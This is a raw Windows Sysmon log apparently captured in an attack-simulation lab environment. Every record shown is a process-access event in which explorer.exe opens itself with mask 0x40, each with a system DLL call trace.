22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 